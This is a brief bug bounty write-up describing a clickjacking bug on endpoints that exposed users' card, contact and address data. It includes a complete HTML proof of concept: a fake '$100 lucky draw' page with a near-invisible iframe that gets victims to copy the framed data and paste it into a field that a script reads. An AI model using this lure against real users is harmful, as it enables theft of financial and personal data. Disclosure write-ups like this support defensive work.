$1800 worth Clickjacking
In this writeup, I will talk about how I earned a total of $1800 by exploiting Clickjacking on pages where User sensitive information was disclosed, It was a private program on Bugcorwd.
So there were some API endpoints, which were disclosing User Information like Credit Card Data, Email, Name, Phone, Address, User Id, etc.
https://example.com/api/v1/wallet/payments?language=en
https://example.com/api/v1/profile/personal
https://example.com/api/v1/wallet/address/shipping
https://www.example.com/no-cache/profileSystem/getProfile
Now as there was no X-FRAME Header on any of these endpoints so I was able to load them in an IFRAME.
Now I had to create an HTML page to trick the user into stealing their Information. So I created an HTML page.
HTML CODE
<!DOCTYPE html>
<html>
<head>
<title></title>
</head>
<body><div id=”parent”>
<center><h1 style=”color: blue; text-decoration: underline;”>Lucky Draw to Win $100</h1></center>
<h3>Click inside the box and Press CTRL+A then CTRL+C</h3>
<div style=”border: 2px solid gray;”>
<iframe src=”https://example.com/api/v1/wallet/payments?language=en" width=”100%” style=”opacity: 0.01"></iframe></div>
<h3>Click inside the box and press CTRL+V</h3>
<input type=”password” name=”” size=”1">
<! — <textarea rows=”1" cols=”1" style=”resize: none;”></textarea> →
<br>
<button id=”btn”>Click to Win</button></div>
</body>
<script>
document.querySelector(“#btn”).onclick = function() {
console.log(document.querySelector(“input”).value)
alert(“Congratulation! You have won $100”)
}
</script></html>
Now after performing all the steps when the user will click on the Button, his/her information will be logged in the console.
So that was it, Thank you for Reading.